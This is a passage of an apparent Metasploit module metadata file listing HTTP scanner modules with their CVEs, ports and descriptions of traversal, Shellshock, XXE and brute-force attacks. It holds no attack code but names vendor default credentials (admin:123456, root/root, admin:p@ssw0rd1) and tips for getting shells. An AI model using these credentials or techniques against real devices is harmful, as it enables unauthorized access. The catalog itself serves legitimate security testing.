"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/advantech_webaccess_login.rb",
"is_install_path": true,
"ref_name": "scanner/http/advantech_webaccess_login",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/allegro_rompager_misfortune_cookie": {
"name": "Allegro Software RomPager 'Misfortune Cookie' (CVE-2014-9222) Scanner",
"full_name": "auxiliary/scanner/http/allegro_rompager_misfortune_cookie",
"rank": 300,
"disclosure_date": "2014-12-17",
"type": "auxiliary",
"author": [
"Jon Hart <jon_hart@rapid7.com>",
"Lior Oppenheim"
],
"description": "This module scans for HTTP servers that appear to be vulnerable to the\n 'Misfortune Cookie' vulnerability which affects Allegro Software\n Rompager versions before 4.34 and can allow attackers to authenticate\n to the HTTP service as an administrator without providing valid\n credentials.",
"references": [
"CVE-2014-9222",
"URL-http://mis.fortunecook.ie",
"URL-http://mis.fortunecook.ie/misfortune-cookie-suspected-vulnerable.pdf",
"URL-http://mis.fortunecook.ie/too-many-cooks-exploiting-tr069_tal-oppenheim_31c3.pdf"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/allegro_rompager_misfortune_cookie.rb",
"is_install_path": true,
"ref_name": "scanner/http/allegro_rompager_misfortune_cookie",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/apache_activemq_source_disclosure": {
"name": "Apache ActiveMQ JSP Files Source Disclosure",
"full_name": "auxiliary/scanner/http/apache_activemq_source_disclosure",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Veerendra G.G",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a source code disclosure in Apache ActiveMQ. The\n vulnerability is due to Jetty's ResourceHandler handling of specially crafted\n URIs starting with //. It has been tested successfully on Apache ActiveMQ 5.3.1\n over Windows 2003 SP2 and Ubuntu 10.04.",
"references": [
"CVE-2010-1587",
"OSVDB-64020",
"BID-39636",
"URL-https://issues.apache.org/jira/browse/AMQ-2700"
],
"platform": "",
"arch": "",
"rport": 8161,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/apache_activemq_source_disclosure.rb",
"is_install_path": true,
"ref_name": "scanner/http/apache_activemq_source_disclosure",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/apache_activemq_traversal": {
"name": "Apache ActiveMQ Directory Traversal",
"full_name": "auxiliary/scanner/http/apache_activemq_traversal",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"AbdulAziz Hariri",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a directory traversal vulnerability in Apache ActiveMQ\n 5.3.1 and 5.3.2 on Windows systems. The vulnerability exists in the Jetty's\n ResourceHandler installed with the affected versions. This module has been tested\n successfully on ActiveMQ 5.3.1 and 5.3.2 over Windows 2003 SP2.",
"references": [
"OSVDB-86401",
"URL-http://www.verisigninc.com/en_US/products-and-services/network-intelligence-availability/idefense/public-vulnerability-reports/articles/index.xhtml?id=895",
"URL-https://issues.apache.org/jira/browse/amq-2788"
],
"platform": "",
"arch": "",
"rport": 8161,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/apache_activemq_traversal.rb",
"is_install_path": true,
"ref_name": "scanner/http/apache_activemq_traversal",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/apache_mod_cgi_bash_env": {
"name": "Apache mod_cgi Bash Environment Variable Injection (Shellshock) Scanner",
"full_name": "auxiliary/scanner/http/apache_mod_cgi_bash_env",
"rank": 300,
"disclosure_date": "2014-09-24",
"type": "auxiliary",
"author": [
"Stephane Chazelas",
"wvu <wvu@metasploit.com>",
"lcamtuf"
],
"description": "This module scans for the Shellshock vulnerability, a flaw in how the Bash shell\n handles external environment variables. This module targets CGI scripts in the\n Apache web server by setting the HTTP_USER_AGENT environment variable to a\n malicious function definition.\n\n PROTIP: Use exploit/multi/handler with a PAYLOAD appropriate to your\n CMD, set ExitOnSession false, run -j, and then run this module to create\n sessions on vulnerable hosts.\n\n Note that this is not the recommended method for obtaining shells.\n If you require sessions, please use the apache_mod_cgi_bash_env_exec\n exploit module instead.",
"references": [
"CVE-2014-6271",
"CVE-2014-6278",
"OSVDB-112004",
"EDB-34765",
"URL-https://access.redhat.com/articles/1200223",
"URL-https://seclists.org/oss-sec/2014/q3/649"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2018-11-16 12:18:28 +0000",
"path": "/modules/auxiliary/scanner/http/apache_mod_cgi_bash_env.rb",
"is_install_path": true,
"ref_name": "scanner/http/apache_mod_cgi_bash_env",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
"AKA": [
"Shellshock"
]
}
},
"auxiliary_scanner/http/apache_optionsbleed": {
"name": "Apache Optionsbleed Scanner",
"full_name": "auxiliary/scanner/http/apache_optionsbleed",
"rank": 300,
"disclosure_date": "2017-09-18",
"type": "auxiliary",
"author": [
"Hanno Böck",
"h00die"
],
"description": "This module scans for the Apache optionsbleed vulnerability where the Allow\n response header returned from an OPTIONS request may bleed memory if the\n server has a .htaccess file with an invalid Limit method defined.",
"references": [
"CVE-2017-9798",
"EDB-42745",
"URL-https://github.com/hannob/optionsbleed",
"URL-https://blog.fuzzing-project.org/60-Optionsbleed-HTTP-OPTIONS-method-can-leak-Apaches-server-memory.html"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2018-08-27 13:11:22 +0000",
"path": "/modules/auxiliary/scanner/http/apache_optionsbleed.rb",
"is_install_path": true,
"ref_name": "scanner/http/apache_optionsbleed",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
"AKA": [
"Optionsbleed"
]
}
},
"auxiliary_scanner/http/apache_userdir_enum": {
"name": "Apache \"mod_userdir\" User Enumeration",
"full_name": "auxiliary/scanner/http/apache_userdir_enum",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Heyder Andrade <heyder.andrade@alligatorteam.org>"
],
"description": "Apache with the UserDir directive enabled generates different error\n codes when a username exists and there is no public_html directory and when the username\n does not exist, which could allow remote attackers to determine valid usernames on the\n server.",
"references": [
"BID-3335",
"CVE-2001-1013",
"OSVDB-637"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/apache_userdir_enum.rb",
"is_install_path": true,
"ref_name": "scanner/http/apache_userdir_enum",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/appletv_login": {
"name": "AppleTV AirPlay Login Utility",
"full_name": "auxiliary/scanner/http/appletv_login",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"0a29406d9794e4f9b30b3c5d6702c708",
"thelightcosine"
],
"description": "This module attempts to authenticate to an AppleTV service with\n the username, 'AirPlay'. The device has two different access control\n modes: OnScreen and Password. The difference between the two is the\n password in OnScreen mode is numeric-only and four digits long, which\n means when this option is enabled, the module will make\n sure to cover all of them - from 0000 to 9999. The Password mode is\n more complex, therefore the usual online bruteforce strategies apply.",
"references": [
"URL-http://nto.github.io/AirPlay.html"
],
"platform": "",
"arch": "",
"rport": 7000,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/appletv_login.rb",
"is_install_path": true,
"ref_name": "scanner/http/appletv_login",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/atlassian_crowd_fileaccess": {
"name": "Atlassian Crowd XML Entity Expansion Remote File Access",
"full_name": "auxiliary/scanner/http/atlassian_crowd_fileaccess",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Will Caput",
"Trevor Hartman",
"Thaddeus Bogner",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module simply attempts to read a remote file from the server using a\n vulnerability in the way Atlassian Crowd handles XML files. The vulnerability\n occurs while trying to expand external entities with the SYSTEM identifier. This\n module has been tested successfully on Linux and Windows installations of Crowd.",
"references": [
"CVE-2012-2926",
"OSVDB-82274",
"BID-53595",
"URL-https://www.neg9.org",
"URL-https://confluence.atlassian.com/display/CROWD/Crowd+Security+Advisory+2012-05-17"
],
"platform": "",
"arch": "",
"rport": 8095,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443,
8095
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2019-03-05 03:38:51 +0000",
"path": "/modules/auxiliary/scanner/http/atlassian_crowd_fileaccess.rb",
"is_install_path": true,
"ref_name": "scanner/http/atlassian_crowd_fileaccess",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/axis_local_file_include": {
"name": "Apache Axis2 v1.4.1 Local File Inclusion",
"full_name": "auxiliary/scanner/http/axis_local_file_include",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Tiago Ferreira <tiago.ccna@gmail.com>"
],
"description": "This module exploits an Apache Axis2 v1.4.1 local file inclusion (LFI) vulnerability.\n By loading a local XML file which contains a cleartext username and password, attackers can trivially\n recover authentication credentials to Axis services.",
"references": [
"EDB-12721",
"OSVDB-59001"
],
"platform": "",
"arch": "",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/axis_local_file_include.rb",
"is_install_path": true,
"ref_name": "scanner/http/axis_local_file_include",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/axis_login": {
"name": "Apache Axis2 Brute Force Utility",
"full_name": "auxiliary/scanner/http/axis_login",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Leandro Oliveira <leandrofernando@gmail.com>"
],
"description": "This module attempts to login to an Apache Axis2 instance using\n username and password combinations indicated by the USER_FILE,\n PASS_FILE, and USERPASS_FILE options. It has been verified to\n work on at least versions 1.4.1 and 1.6.2.",
"references": [
"CVE-2010-0219",
"OSVDB-68662"
],
"platform": "",
"arch": "",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/axis_login.rb",
"is_install_path": true,
"ref_name": "scanner/http/axis_login",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/backup_file": {
"name": "HTTP Backup File Scanner",
"full_name": "auxiliary/scanner/http/backup_file",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"et <et@metasploit.com>"
],
"description": "This module identifies the existence of possible copies\n of a specific file in a given path.",
"references": [
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2018-07-22 20:50:22 +0000",
"path": "/modules/auxiliary/scanner/http/backup_file.rb",
"is_install_path": true,
"ref_name": "scanner/http/backup_file",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/barracuda_directory_traversal": {
"name": "Barracuda Multiple Product \"locale\" Directory Traversal",
"full_name": "auxiliary/scanner/http/barracuda_directory_traversal",
"rank": 300,
"disclosure_date": "2010-10-08",
"type": "auxiliary",
"author": [
"Tiago Ferreira <tiago.ccna@gmail.com>"
],
"description": "This module exploits a directory traversal vulnerability present in\n several Barracuda products, including the Barracuda Spam and Virus Firewall,\n Barracuda SSL VPN, and the Barracuda Web Application Firewall. By default,\n this module will attempt to download the Barracuda configuration file.",
"references": [
"OSVDB-68301",
"URL-http://secunia.com/advisories/41609/",
"EDB-15130"
],
"platform": "",
"arch": "",
"rport": 8000,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-08-26 21:01:10 +0000",
"path": "/modules/auxiliary/scanner/http/barracuda_directory_traversal.rb",
"is_install_path": true,
"ref_name": "scanner/http/barracuda_directory_traversal",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/bavision_cam_login": {
"name": "BAVision IP Camera Web Server Login",
"full_name": "auxiliary/scanner/http/bavision_cam_login",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module will attempt to authenticate to an IP camera created by BAVision via the\n web service. By default, the vendor ships a default credential admin:123456 to its\n cameras, and the web server does not enforce lockouts in case of a bruteforce attack.",
"references": [
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/bavision_cam_login.rb",
"is_install_path": true,
"ref_name": "scanner/http/bavision_cam_login",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/binom3_login_config_pass_dump": {
"name": "Binom3 Web Management Login Scanner, Config and Password File Dump",
"full_name": "auxiliary/scanner/http/binom3_login_config_pass_dump",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Karn Ganeshen <KarnGaneshen@gmail.com>"
],
"description": "This module scans for Binom3 Multifunctional Revenue Energy Meter and Power Quality Analyzer\n management login portal(s), and attempts to identify valid credentials.\n There are four (4) default accounts - 'root'/'root', 'admin'/'1', 'alg'/'1', 'user'/'1'.\n In addition to the device config, the 'root' user can also access the password file.\n Other users - admin, alg, user - can only access the configuration file.\n The module attempts to download the configuration and password files depending on the login credentials found.",
"references": [
"URL-https://ics-cert.us-cert.gov/advisories/ICSA-17-031-01"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/binom3_login_config_pass_dump.rb",
"is_install_path": true,
"ref_name": "scanner/http/binom3_login_config_pass_dump",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/bitweaver_overlay_type_traversal": {
"name": "Bitweaver overlay_type Directory Traversal",
"full_name": "auxiliary/scanner/http/bitweaver_overlay_type_traversal",
"rank": 300,
"disclosure_date": "2012-10-23",
"type": "auxiliary",
"author": [
"David Aaron",
"Jonathan Claudius",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a directory traversal vulnerability found in Bitweaver.\n When handling the 'overlay_type' parameter, view_overlay.php fails to do any\n path checking/filtering, which can be abused to read any file outside the\n virtual directory.",
"references": [
"CVE-2012-5192",
"OSVDB-86599",
"EDB-22216",
"URL-https://www.trustwave.com/spiderlabs/advisories/TWSL2012-016.txt"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-08-26 21:01:10 +0000",
"path": "/modules/auxiliary/scanner/http/bitweaver_overlay_type_traversal.rb",
"is_install_path": true,
"ref_name": "scanner/http/bitweaver_overlay_type_traversal",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/blind_sql_query": {
"name": "HTTP Blind SQL Injection Scanner",
"full_name": "auxiliary/scanner/http/blind_sql_query",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"et <et@metasploit.com>"
],
"description": "This module identifies the existence of Blind SQL injection issues\n in GET/POST Query parameters values.",
"references": [
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/blind_sql_query.rb",
"is_install_path": true,
"ref_name": "scanner/http/blind_sql_query",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/bmc_trackit_passwd_reset": {
"name": "BMC TrackIt! Unauthenticated Arbitrary User Password Change",
"full_name": "auxiliary/scanner/http/bmc_trackit_passwd_reset",
"rank": 300,
"disclosure_date": "2014-12-09",
"type": "auxiliary",
"author": [
"bperry",
"jhart"
],
"description": "This module exploits a flaw in the password reset mechanism in BMC TrackIt! 11.3\n and possibly prior versions. If the password reset service is configured to use\n a domain administrator (which is the recommended configuration), then domain\n credentials can be reset (such as domain Administrator).",
"references": [
"URL-http://www.zerodayinitiative.com/advisories/ZDI-14-419/",
"CVE-2014-8270"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/bmc_trackit_passwd_reset.rb",
"is_install_path": true,
"ref_name": "scanner/http/bmc_trackit_passwd_reset",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_scanner/http/brute_dirs": {
"name": "HTTP Directory Brute Force Scanner",
"full_name": "auxiliary/scanner/http/brute_dirs",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"et <et@metasploit.com>"
],
"description": "This module identifies the existence of interesting directories by brute forcing the name\n in a given directory path.",
"references": [
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/brute_dirs.rb",
"is_install_path": true,
"ref_name": "scanner/http/brute_dirs",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/buffalo_login": {
"name": "Buffalo NAS Login Utility",
"full_name": "auxiliary/scanner/http/buffalo_login",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Nicholas Starke <starke.nicholas@gmail.com>"
],
"description": "This module simply attempts to login to a Buffalo NAS instance using a specific\n username and password. It has been confirmed to work on version 1.68.",
"references": [
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/buffalo_login.rb",
"is_install_path": true,
"ref_name": "scanner/http/buffalo_login",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/buildmaster_login": {
"name": "Inedo BuildMaster Login Scanner",
"full_name": "auxiliary/scanner/http/buildmaster_login",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"James Otten <jamesotten1@gmail.com>"
],
"description": "This module will attempt to authenticate to BuildMaster. There is a default user 'Admin'\n which has the default password 'Admin'.",
"references": [
],
"platform": "",
"arch": "",
"rport": 81,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-09-15 00:18:33 +0000",
"path": "/modules/auxiliary/scanner/http/buildmaster_login.rb",
"is_install_path": true,
"ref_name": "scanner/http/buildmaster_login",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/caidao_bruteforce_login": {
"name": "Chinese Caidao Backdoor Bruteforce",
"full_name": "auxiliary/scanner/http/caidao_bruteforce_login",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Nixawk"
],
"description": "This module attempts to bruteforce the Chinese Caidao ASP/PHP/ASPX backdoor.",
"references": [
"URL-https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html",
"URL-https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-ii.html",
"URL-https://www.exploit-db.com/docs/27654.pdf",
"URL-https://www.us-cert.gov/ncas/alerts/TA15-313A",
"URL-http://blog.csdn.net/nixawk/article/details/40430329"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/caidao_bruteforce_login.rb",
"is_install_path": true,
"ref_name": "scanner/http/caidao_bruteforce_login",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/canon_wireless": {
"name": "Canon Printer Wireless Configuration Disclosure",
"full_name": "auxiliary/scanner/http/canon_wireless",
"rank": 300,
"disclosure_date": "2013-06-18",
"type": "auxiliary",
"author": [
"Matt \"hostess\" Andreko <mandreko@accuvant.com>"
],
"description": "This module enumerates wireless credentials from Canon printers with a web interface.\n It has been tested on Canon models: MG3100, MG5300, MG6100, MP495, MX340, MX870,\n MX890, MX920.",
"references": [
"CVE-2013-4614",
"OSVDB-94417",
"URL-http://www.mattandreko.com/2013/06/canon-y-u-no-security.html"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/canon_wireless.rb",
"is_install_path": true,
"ref_name": "scanner/http/canon_wireless",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/cert": {
"name": "HTTP SSL Certificate Checker",
"full_name": "auxiliary/scanner/http/cert",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"nebulus"
],
"description": "This module will check the certificate of the specified web servers\n to ensure the subject and issuer match the supplied pattern and that the certificate\n is not expired.",
"references": [
],
"platform": "",
"arch": "",
"rport": 443,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/cert.rb",
"is_install_path": true,
"ref_name": "scanner/http/cert",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/cgit_traversal": {
"name": "cgit Directory Traversal",
"full_name": "auxiliary/scanner/http/cgit_traversal",
"rank": 300,
"disclosure_date": "2018-08-03",
"type": "auxiliary",
"author": [
"Google Project Zero",
"Dhiraj Mishra"
],
"description": "This module exploits a directory traversal vulnerability which\n exists in cgit < 1.2.1 cgit_clone_objects(), reachable when the\n configuration flag enable-http-clone is set to 1 (default).",
"references": [
"CVE-2018-14912",
"URL-https://bugs.chromium.org/p/project-zero/issues/detail?id=1627",
"EDB-45148"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2018-08-13 15:48:21 +0000",
"path": "/modules/auxiliary/scanner/http/cgit_traversal.rb",
"is_install_path": true,
"ref_name": "scanner/http/cgit_traversal",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/chef_webui_login": {
"name": "Chef Web UI Brute Force Utility",
"full_name": "auxiliary/scanner/http/chef_webui_login",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module attempts to login to a Chef Web UI server instance using username and password\n combinations indicated by the USER_FILE, PASS_FILE, and USERPASS_FILE options. It\n will also test for the default login (admin:p@ssw0rd1).",
"references": [
],
"platform": "",
"arch": "",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/chef_webui_login.rb",
"is_install_path": true,
"ref_name": "scanner/http/chef_webui_login",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/chromecast_webserver": {
"name": "Chromecast Web Server Scanner",
"full_name": "auxiliary/scanner/http/chromecast_webserver",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"wvu <wvu@metasploit.com>"
],
"description": "This module scans for the Chromecast web server on port 8008/TCP, and\n can be used to discover devices which can be targeted by other Chromecast\n modules, such as chromecast_youtube.",
"references": [
"URL-https://www.google.com/chrome/devices/chromecast/"
],
"platform": "",
"arch": "",
"rport": 8008,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-11-01 15:05:49 +0000",
"path": "/modules/auxiliary/scanner/http/chromecast_webserver.rb",
"is_install_path": true,
"ref_name": "scanner/http/chromecast_webserver",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/chromecast_wifi": {
"name": "Chromecast Wifi Enumeration",
"full_name": "auxiliary/scanner/http/chromecast_wifi",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"wvu <wvu@metasploit.com>"
],
"description": "This module enumerates wireless access points through Chromecast.",
"references": [
"URL-http://www.google.com/intl/en/chrome/devices/chromecast/index.html"
],
"platform": "",
"arch": "",
"rport": 8008,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-11-01 15:05:49 +0000",
"path": "/modules/auxiliary/scanner/http/chromecast_wifi.rb",
"is_install_path": true,
"ref_name": "scanner/http/chromecast_wifi",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/cisco_asa_asdm": {
"name": "Cisco ASA ASDM Bruteforce Login Utility",
"full_name": "auxiliary/scanner/http/cisco_asa_asdm",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Jonathan Claudius <jclaudius@trustwave.com>"
],
"description": "This module scans for Cisco ASA ASDM web login portals and\n performs login brute force to identify valid credentials.",
"references": [
],
"platform": "",
"arch": "",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/cisco_asa_asdm.rb",
"is_install_path": true,
"ref_name": "scanner/http/cisco_asa_asdm",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_scanner/http/cisco_device_manager": {
"name": "Cisco Device HTTP Device Manager Access",
"full_name": "auxiliary/scanner/http/cisco_device_manager",
"rank": 300,
"disclosure_date": "2000-10-26",
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module gathers data from a Cisco device (router or switch) with the device manager\n web interface exposed. The HttpUsername and HttpPassword options can be used to specify\n authentication.",
"references": [
"BID-1846",
"CVE-2000-0945",
"OSVDB-444"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2018-10-16 14:01:49 +0000",
"path": "/modules/auxiliary/scanner/http/cisco_device_manager.rb",
"is_install_path": true,
"ref_name": "scanner/http/cisco_device_manager",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_scanner/http/cisco_directory_traversal": {
"name": "Cisco ASA Directory Traversal",
"full_name": "auxiliary/scanner/http/cisco_directory_traversal",
"rank": 300,
"disclosure_date": "2018-06-06",
"type": "auxiliary",
"author": [
"Michał Bentkowski",
"Yassine Aboukir",
"Shelby Pace"
],
